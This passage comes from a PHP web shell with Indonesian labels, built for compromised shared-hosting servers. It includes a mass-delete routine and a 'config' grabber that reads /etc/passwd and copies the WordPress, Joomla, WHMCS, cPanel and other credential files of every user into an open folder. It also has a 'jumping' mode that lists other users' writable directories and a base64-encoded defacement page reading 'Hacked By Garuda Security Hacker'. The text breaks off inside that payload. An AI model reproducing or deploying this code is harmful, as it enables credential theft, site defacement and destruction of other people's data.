  1395.                 $lokasi = $dirc.'/'.$namafile;
  1396.                 if($dirb === '.') {
  1397.                     if(file_exists("$dir/$namafile")) {
  1398.                         unlink("$dir/$namafile");
  1399.                     }
  1400.                 } elseif($dirb === '..') {
  1401.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1402.                         unlink("".dirname($dir)."/$namafile");
  1403.                     }
  1404.                 } else {
  1405.                     if(is_dir($dirc)) {
  1406.                         if(is_writable($dirc)) {
  1407.                             if(file_exists($lokasi)) {
  1408.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1409.                                 unlink($lokasi);
  1410.                                 $idx = hapus_massal($dirc,$namafile);
  1411.                             }
  1412.                         }
  1413.                     }
  1414.                 }
  1415.             }
  1416.         }
  1417.     }
  1418.     if($_POST['start']) {
  1419.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1420.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1421.         echo "</div>";
  1422.     } else {
  1423.     echo "<center>";
  1424.     echo "<form method='post'>
  1425.     <font style='text-decoration: underline;'>Folder:</font><br>
  1426.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1427.     <font style='text-decoration: underline;'>Filename:</font><br>
  1428.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1429.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1430.     </form></center>";
  1431.     }
  1432. } elseif($_GET['do'] == 'config') {
  1433.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1434.     $idx = mkdir("idx_config", 0777);
  1435.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1436.     $htc = fopen("idx_config/.htaccess","w");
  1437.     fwrite($htc, $isi_htc);
  1438.     while($passwd = fgets($etc)) {
  1439.         if($passwd == "" || !$etc) {
  1440.             echo "<font color=red>Can't read /etc/passwd</font>";
  1441.         } else {
  1442.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1443.             foreach($user_config[1] as $user_idx) {
  1444.                 $user_config_dir = "/home/$user_idx/public_html/";
  1445.                 if(is_readable($user_config_dir)) {
  1446.                     $grab_config = array(
  1447. "/home/$user_idx/public_html/vb/includes/config.php" => "Vbulletin.txt",
  1448. "/home/$user_idx/public_html/includes/config.php" => "Vbulletin.txt",
  1449. "/home/$user_idx/public_html/forum/includes/config.php" => "Vbulletin.txt",
  1450. "/home/$user_idx/public_html/forums/includes/config.php" => "Vbulletin.txt",
  1451. "/home/$user_idx/public_html/cc/includes/config.php" => "Vbulletin.txt",
  1452. "/home/$user_idx/public_html/inc/config.php" => "MyBB.txt",
  1453. "/home/$user_idx/public_html/includes/configure.php" => "OsCommerce.txt",
  1454. "/home/$user_idx/public_html/shop/includes/configure.php" => "OsCommerce.txt",
  1455. "/home/$user_idx/public_html/os/includes/configure.php" => "OsCommerce.txt",
  1456. "/home/$user_idx/public_html/oscom/includes/configure.php" => "OsCommerce.txt",
  1457. "/home/$user_idx/public_html/products/includes/configure.php" => "OsCommerce.txt",
  1458. "/home/$user_idx/public_html/cart/includes/configure.php" => "OsCommerce.txt",
  1459. "/home/$user_idx/public_html/inc/conf_global.php" => "IPB.txt",
  1460. "/home/$user_idx/public_html/wp-config.php" => "Wordpress.txt",
  1461. "/home/$user_idx/public_html/wp/test/wp-config.php" => "Wordpress.txt",
  1462. "/home/$user_idx/public_html/blog/wp-config.php" => "Wordpress.txt",
  1463. "/home/$user_idx/public_html/beta/wp-config.php" => "Wordpress.txt",
  1464. "/home/$user_idx/public_html/portal/wp-config.php" => "Wordpress.txt",
  1465. "/home/$user_idx/public_html/site/wp-config.php" => "Wordpress.txt",
  1466. "/home/$user_idx/public_html/wp/wp-config.php" => "Wordpress.txt",
  1467. "/home/$user_idx/public_html/WP/wp-config.php" => "Wordpress.txt",
  1468. "/home/$user_idx/public_html/news/wp-config.php" => "Wordpress.txt",
  1469. "/home/$user_idx/public_html/wordpress/wp-config.php" => "Wordpress.txt",
  1470. "/home/$user_idx/public_html/test/wp-config.php" => "Wordpress.txt",
  1471. "/home/$user_idx/public_html/demo/wp-config.php" => "Wordpress.txt",
  1472. "/home/$user_idx/public_html/home/wp-config.php" => "Wordpress.txt",
  1473. "/home/$user_idx/public_html/v1/wp-config.php" => "Wordpress.txt",
  1474. "/home/$user_idx/public_html/v2/wp-config.php" => "Wordpress.txt",
  1475. "/home/$user_idx/public_html/press/wp-config.php" => "Wordpress.txt",
  1476. "/home/$user_idx/public_html/new/wp-config.php" => "Wordpress.txt",
  1477. "/home/$user_idx/public_html/blogs/wp-config.php" => "Wordpress.txt",
  1478. "/home/$user_idx/public_html/configuration.php" => "Joomla.txt",
  1479. "/home/$user_idx/public_html/blog/configuration.php" => "Joomla.txt",
  1480. "/home/$user_idx/public_html/submitticket.php" => "^WHMCS.txt",
  1481. "/home/$user_idx/public_html/cms/configuration.php" => "Joomla.txt",
  1482. "/home/$user_idx/public_html/beta/configuration.php" => "Joomla.txt",
  1483. "/home/$user_idx/public_html/portal/configuration.php" => "Joomla.txt",
  1484. "/home/$user_idx/public_html/site/configuration.php" => "Joomla.txt",
  1485. "/home/$user_idx/public_html/main/configuration.php" => "Joomla.txt",
  1486. "/home/$user_idx/public_html/home/configuration.php" => "Joomla.txt",
  1487. "/home/$user_idx/public_html/demo/configuration.php" => "Joomla.txt",
  1488. "/home/$user_idx/public_html/test/configuration.php" => "Joomla.txt",
  1489. "/home/$user_idx/public_html/v1/configuration.php" => "Joomla.txt",
  1490. "/home/$user_idx/public_html/v2/configuration.php" => "Joomla.txt",
  1491. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla.txt",
  1492. "/home/$user_idx/public_html/new/configuration.php" => "Joomla.txt",
  1493. "/home/$user_idx/public_html/WHMCS/configuration.php" => "WHMCS.txt",
  1494. "/home/$user_idx/public_html/whmcs1/configuration.php" => "WHMCS.txt",
  1495. "/home/$user_idx/public_html/Whmcs/configuration.php" => "WHMCS.txt",
  1496. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS.txt",
  1497. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS.txt",
  1498. "/home/$user_idx/public_html/WHMC/configuration.php" => "WHMCS.txt",
  1499. "/home/$user_idx/public_html/Whmc/configuration.php" => "WHMCS.txt",
  1500. "/home/$user_idx/public_html/whmc/configuration.php" => "WHMCS.txt",
  1501. "/home/$user_idx/public_html/WHM/configuration.php" => "WHMCS.txt",
  1502. "/home/$user_idx/public_html/Whm/configuration.php" => "WHMCS.txt",
  1503. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS.txt",
  1504. "/home/$user_idx/public_html/HOST/configuration.php" => "WHMCS.txt",
  1505. "/home/$user_idx/public_html/Host/configuration.php" => "WHMCS.txt",
  1506. "/home/$user_idx/public_html/host/configuration.php" => "WHMCS.txt",
  1507. "/home/$user_idx/public_html/SUPPORTES/configuration.php" => "WHMCS.txt",
  1508. "/home/$user_idx/public_html/Supportes/configuration.php" => "WHMCS.txt",
  1509. "/home/$user_idx/public_html/supportes/configuration.php" => "WHMCS.txt",
  1510. "/home/$user_idx/public_html/domains/configuration.php" => "WHMCS.txt",
  1511. "/home/$user_idx/public_html/domain/configuration.php" => "WHMCS.txt",
  1512. "/home/$user_idx/public_html/Hosting/configuration.php" => "WHMCS.txt",
  1513. "/home/$user_idx/public_html/HOSTING/configuration.php" => "WHMCS.txt",
  1514. "/home/$user_idx/public_html/hosting/configuration.php" => "WHMCS.txt",
  1515. "/home/$user_idx/public_html/CART/configuration.php" => "WHMCS.txt",
  1516. "/home/$user_idx/public_html/Cart/configuration.php" => "WHMCS.txt",
  1517. "/home/$user_idx/public_html/cart/configuration.php" => "WHMCS.txt",
  1518. "/home/$user_idx/public_html/ORDER/configuration.php" => "WHMCS.txt",
  1519. "/home/$user_idx/public_html/Order/configuration.php" => "WHMCS.txt",
  1520. "/home/$user_idx/public_html/order/configuration.php" => "WHMCS.txt",
  1521. "/home/$user_idx/public_html/CLIENT/configuration.php" => "WHMCS.txt",
  1522. "/home/$user_idx/public_html/Client/configuration.php" => "WHMCS.txt",
  1523. "/home/$user_idx/public_html/client/configuration.php" => "WHMCS.txt",
  1524. "/home/$user_idx/public_html/CLIENTAREA/configuration.php" => "WHMCS.txt",
  1525. "/home/$user_idx/public_html/Clientarea/configuration.php" => "WHMCS.txt",
  1526. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS.txt",
  1527. "/home/$user_idx/public_html/SUPPORT/configuration.php" => "WHMCS.txt",
  1528. "/home/$user_idx/public_html/Support/configuration.php" => "WHMCS.txt",
  1529. "/home/$user_idx/public_html/support/configuration.php" => "WHMCS.txt",
  1530. "/home/$user_idx/public_html/BILLING/configuration.php" => "WHMCS.txt",
  1531. "/home/$user_idx/public_html/Billing/configuration.php" => "WHMCS.txt",
  1532. "/home/$user_idx/public_html/billing/configuration.php" => "WHMCS.txt",
  1533. "/home/$user_idx/public_html/BUY/configuration.php" => "WHMCS.txt",
  1534. "/home/$user_idx/public_html/Buy/configuration.php" => "WHMCS.txt",
  1535. "/home/$user_idx/public_html/buy/configuration.php" => "WHMCS.txt",
  1536. "/home/$user_idx/public_html/MANAGE/configuration.php" => "WHMCS.txt",
  1537. "/home/$user_idx/public_html/Manage/configuration.php" => "WHMCS.txt",
  1538. "/home/$user_idx/public_html/manage/configuration.php" => "WHMCS.txt",
  1539. "/home/$user_idx/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS.txt",
  1540. "/home/$user_idx/public_html/ClientSupport/configuration.php" => "WHMCS.txt",
  1541. "/home/$user_idx/public_html/Clientsupport/configuration.php" => "WHMCS.txt",
  1542. "/home/$user_idx/public_html/clientsupport/configuration.php" => "WHMCS.txt",
  1543. "/home/$user_idx/public_html/CHECKOUT/configuration.php" => "WHMCS.txt",
  1544. "/home/$user_idx/public_html/Checkout/configuration.php" => "WHMCS.txt",
  1545. "/home/$user_idx/public_html/checkout/configuration.php" => "WHMCS.txt",
  1546. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS.txt",
  1547. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS.txt",
  1548. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS.txt",
  1549. "/home/$user_idx/public_html/BASKET/configuration.php" => "WHMCS.txt",
  1550. "/home/$user_idx/public_html/Basket/configuration.php" => "WHMCS.txt",
  1551. "/home/$user_idx/public_html/basket/configuration.php" => "WHMCS.txt",
  1552. "/home/$user_idx/public_html/SECURE/configuration.php" => "WHMCS.txt",
  1553. "/home/$user_idx/public_html/Secure/configuration.php" => "WHMCS.txt",
  1554. "/home/$user_idx/public_html/secure/configuration.php" => "WHMCS.txt",
  1555. "/home/$user_idx/public_html/SALES/configuration.php" => "WHMCS.txt",
  1556. "/home/$user_idx/public_html/Sales/configuration.php" => "WHMCS.txt",
  1557. "/home/$user_idx/public_html/sales/configuration.php" => "WHMCS.txt",
  1558. "/home/$user_idx/public_html/BILL/configuration.php" => "WHMCS.txt",
  1559. "/home/$user_idx/public_html/Bill/configuration.php" => "WHMCS.txt",
  1560. "/home/$user_idx/public_html/bill/configuration.php" => "WHMCS.txt",
  1561. "/home/$user_idx/public_html/PURCHASE/configuration.php" => "WHMCS.txt",
  1562. "/home/$user_idx/public_html/Purchase/configuration.php" => "WHMCS.txt",
  1563. "/home/$user_idx/public_html/purchase/configuration.php" => "WHMCS.txt",
  1564. "/home/$user_idx/public_html/ACCOUNT/configuration.php" => "WHMCS.txt",
  1565. "/home/$user_idx/public_html/Account/configuration.php" => "WHMCS.txt",
  1566. "/home/$user_idx/public_html/account/configuration.php" => "WHMCS.txt",
  1567. "/home/$user_idx/public_html/USER/configuration.php" => "WHMCS.txt",
  1568. "/home/$user_idx/public_html/User/configuration.php" => "WHMCS.txt",
  1569. "/home/$user_idx/public_html/user/configuration.php" => "WHMCS.txt",
  1570. "/home/$user_idx/public_html/CLIENTS/configuration.php" => "WHMCS.txt",
  1571. "/home/$user_idx/public_html/Clients/configuration.php" => "WHMCS.txt",
  1572. "/home/$user_idx/public_html/clients/configuration.php" => "WHMCS.txt",
  1573. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS.txt",
  1574. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS.txt",
  1575. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS.txt",
  1576. "/home/$user_idx/public_html/MY/configuration.php" => "WHMCS.txt",
  1577. "/home/$user_idx/public_html/My/configuration.php" => "WHMCS.txt",
  1578. "/home/$user_idx/public_html/my/configuration.php" => "WHMCS.txt",
  1579. "/home/$user_idx/public_html/secure/whm/configuration.php" => "WHMCS.txt",
  1580. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "WHMCS.txt",
  1581. "/home/$user_idx/public_html/panel/configuration.php" => "WHMCS.txt",
  1582. "/home/$user_idx/public_html/clientes/configuration.php" => "WHMCS.txt",
  1583. "/home/$user_idx/public_html/cliente/configuration.php" => "WHMCS.txt",
  1584. "/home/$user_idx/public_html/support/order/configuration.php" => "WHMCS.txt",
  1585. "/home/$user_idx/public_html/bb-config.php" => "BoxBilling.txt",
  1586. "/home/$user_idx/public_html/boxbilling/bb-config.php" => "BoxBilling.txt",
  1587. "/home/$user_idx/public_html/box/bb-config.php" => "BoxBilling.txt",
  1588. "/home/$user_idx/public_html/host/bb-config.php" => "BoxBilling.txt",
  1589. "/home/$user_idx/public_html/Host/bb-config.php" => "BoxBilling.txt",
  1590. "/home/$user_idx/public_html/supportes/bb-config.php" => "BoxBilling.txt",
  1591. "/home/$user_idx/public_html/support/bb-config.php" => "BoxBilling.txt",
  1592. "/home/$user_idx/public_html/hosting/bb-config.php" => "BoxBilling.txt",
  1593. "/home/$user_idx/public_html/cart/bb-config.php" => "BoxBilling.txt",
  1594. "/home/$user_idx/public_html/order/bb-config.php" => "BoxBilling.txt",
  1595. "/home/$user_idx/public_html/client/bb-config.php" => "BoxBilling.txt",
  1596. "/home/$user_idx/public_html/clients/bb-config.php" => "BoxBilling.txt",
  1597. "/home/$user_idx/public_html/cliente/bb-config.php" => "BoxBilling.txt",
  1598. "/home/$user_idx/public_html/clientes/bb-config.php" => "BoxBilling.txt",
  1599. "/home/$user_idx/public_html/billing/bb-config.php" => "BoxBilling.txt",
  1600. "/home/$user_idx/public_html/billings/bb-config.php" => "BoxBilling.txt",
  1601. "/home/$user_idx/public_html/my/bb-config.php" => "BoxBilling.txt",
  1602. "/home/$user_idx/public_html/secure/bb-config.php" => "BoxBilling.txt",
  1603. "/home/$user_idx/public_html/support/order/bb-config.php" => "BoxBilling.txt",
  1604. "/home/$user_idx/public_html/includes/dist-configure.php" => "Zencart.txt",
  1605. "/home/$user_idx/public_html/zencart/includes/dist-configure.php" => "Zencart.txt",
  1606. "/home/$user_idx/public_html/products/includes/dist-configure.php" => "Zencart.txt",
  1607. "/home/$user_idx/public_html/cart/includes/dist-configure.php" => "Zencart.txt",
  1608. "/home/$user_idx/public_html/shop/includes/dist-configure.php" => "Zencart.txt",
  1609. "/home/$user_idx/public_html/includes/iso4217.php" => "Hostbills.txt",
  1610. "/home/$user_idx/public_html/hostbills/includes/iso4217.php" => "Hostbills.txt",
  1611. "/home/$user_idx/public_html/host/includes/iso4217.php" => "Hostbills.txt",
  1612. "/home/$user_idx/public_html/Host/includes/iso4217.php" => "Hostbills.txt",
  1613. "/home/$user_idx/public_html/supportes/includes/iso4217.php" => "Hostbills.txt",
  1614. "/home/$user_idx/public_html/support/includes/iso4217.php" => "Hostbills.txt",
  1615. "/home/$user_idx/public_html/hosting/includes/iso4217.php" => "Hostbills.txt",
  1616. "/home/$user_idx/public_html/cart/includes/iso4217.php" => "Hostbills.txt",
  1617. "/home/$user_idx/public_html/order/includes/iso4217.php" => "Hostbills.txt",
  1618. "/home/$user_idx/public_html/client/includes/iso4217.php" => "Hostbills.txt",
  1619. "/home/$user_idx/public_html/clients/includes/iso4217.php" => "Hostbills.txt",
  1620. "/home/$user_idx/public_html/cliente/includes/iso4217.php" => "Hostbills.txt",
  1621. "/home/$user_idx/public_html/clientes/includes/iso4217.php" => "Hostbills.txt",
  1622. "/home/$user_idx/public_html/billing/includes/iso4217.php" => "Hostbills.txt",
  1623. "/home/$user_idx/public_html/billings/includes/iso4217.php" => "Hostbills.txt",
  1624. "/home/$user_idx/public_html/my/includes/iso4217.php" => "Hostbills.txt",
  1625. "/home/$user_idx/public_html/secure/includes/iso4217.php" => "Hostbills.txt",
  1626. "/home/$user_idx/public_html/support/order/includes/iso4217.php" => "Hostbills.txt",
  1627. "/home/$user_idx/.my.cnf" => "Cpanel.txt",
  1628. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1629. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1630. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1631. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1632. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1633. "/home/$user_idx/public_html/po-content/config.php" => "Popoji.txt",
  1634. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1635. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1636. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1637. "/home/$user_idx/public_html/config.php" => "AnyWebsite",
  1638. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  1639.                     foreach($grab_config as $config => $nama_config) {
  1640.                         $ambil_config = file_get_contents($config);
  1641.                         if($ambil_config == '') {
  1642.                         } else {
  1643.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  1644.                             fputs($file_config,$ambil_config);
  1645.                         }
  1646.                     }
  1647.                 }      
  1648.             }
  1649.         }  
  1650.     }
  1651.     echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  1652. } elseif($_GET['do'] == 'reverse') {
  1653. ?>
  1654. <br>
  1655. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'>[ Reverse IP Lookup ] </a></center>
  1656. <?php
  1657. } elseif($_GET['do'] == 'jumping') {
  1658.     $i = 0;
  1659.     echo "<div class='margin: 5px auto;'>";
  1660.     if(preg_match("/hsphere/", $dir)) {
  1661.         $urls = explode("\r\n", $_POST['url']);
  1662.         if(isset($_POST['jump'])) {
  1663.             echo "<pre>";
  1664.             foreach($urls as $url) {
  1665.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1666.                 $etc = "/etc/passwd";
  1667.                 $f = fopen($etc,"r");
  1668.                 while($gets = fgets($f)) {
  1669.                     $pecah = explode(":", $gets);
  1670.                     $user = $pecah[0];
  1671.                     $dir_user = "/hsphere/local/home/$user";
  1672.                     if(is_dir($dir_user) === true) {
  1673.                         $url_user = $dir_user."/".$url;
  1674.                         if(is_readable($url_user)) {
  1675.                             $i++;
  1676.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1677.                             if(is_writable($url_user)) {
  1678.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1679.                             }
  1680.                             echo $jrw."<br>";
  1681.                         }
  1682.                     }
  1683.                 }
  1684.             }
  1685.         if($i == 0) {
  1686.         } else {
  1687.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1688.         }
  1689.         echo "</pre>";
  1690.         } else {
  1691.             echo '<center>
  1692.                   <form method="post">
  1693.                   List Domains: <br>
  1694.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1695.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1696.             while($getss = fgets($fp)) {
  1697.                 echo $getss;
  1698.             }
  1699.             echo  '</textarea><br>
  1700.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1701.                   </form></center>';
  1702.         }
  1703.     } elseif(preg_match("/vhosts/", $dir)) {
  1704.         $urls = explode("\r\n", $_POST['url']);
  1705.         if(isset($_POST['jump'])) {
  1706.             echo "<pre>";
  1707.             foreach($urls as $url) {
  1708.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1709.                 if(is_dir($web_vh) === true) {
  1710.                     if(is_readable($web_vh)) {
  1711.                         $i++;
  1712.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1713.                         if(is_writable($web_vh)) {
  1714.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1715.                         }
  1716.                         echo $jrw."<br>";
  1717.                     }
  1718.                 }
  1719.             }
  1720.         if($i == 0) {
  1721.         } else {
  1722.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1723.         }
  1724.         echo "</pre>";
  1725.         } else {
  1726.             echo '<center>
  1727.                   <form method="post">
  1728.                   List Domains: <br>
  1729.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1730.                   bing("ip:$ip");
  1731.             echo  '</textarea><br>
  1732.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1733.                   </form></center>';
  1734.         }
  1735.     } else {
  1736.         echo "<pre>";
  1737.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1738.         while($passwd = fgets($etc)) {
  1739.             if($passwd == '' || !$etc) {
  1740.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1741.             } else {
  1742.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1743.                 foreach($user_jumping[1] as $user_idx_jump) {
  1744.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1745.                     if(is_readable($user_jumping_dir)) {
  1746.                         $i++;
  1747.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1748.                         if(is_writable($user_jumping_dir)) {
  1749.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1750.                         }
  1751.                         echo $jrw;
  1752.                         if(function_exists('posix_getpwuid')) {
  1753.                             $domain_jump = file_get_contents("/etc/named.conf");  
  1754.                             if($domain_jump == '') {
  1755.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1756.                             } else {
  1757.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1758.                                 foreach($domains_jump[1] as $dj) {
  1759.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1760.                                     $user_jumping_url = $user_jumping_url['name'];
  1761.                                     if($user_jumping_url == $user_idx_jump) {
  1762.                                         echo " => ( <u>$dj</u> )<br>";
  1763.                                         break;
  1764.                                     }
  1765.                                 }
  1766.                             }
  1767.                         } else {
  1768.                             echo "<br>";
  1769.                         }
  1770.                     }
  1771.                 }
  1772.             }
  1773.         }
  1774.         if($i == 0) {
  1775.         } else {
  1776.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1777.         }
  1778.         echo "</pre>";
  1779.     }
  1780.     echo "</div>";
  1781. } elseif($_GET['do'] == 'autoklik') {
  1782. ?>
  1783. <form method="post">
  1784. <input type="submit" name="x" value="index.php">
  1785. </form>
  1786. <?php
  1787. $target = explode("\r\n", $_POST['target']);
  1788. if($_POST['x']) {
  1789.     foreach($target as $korban) {
  1790.         $global = "index.php";
  1791.         $isi_nama_doang = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9I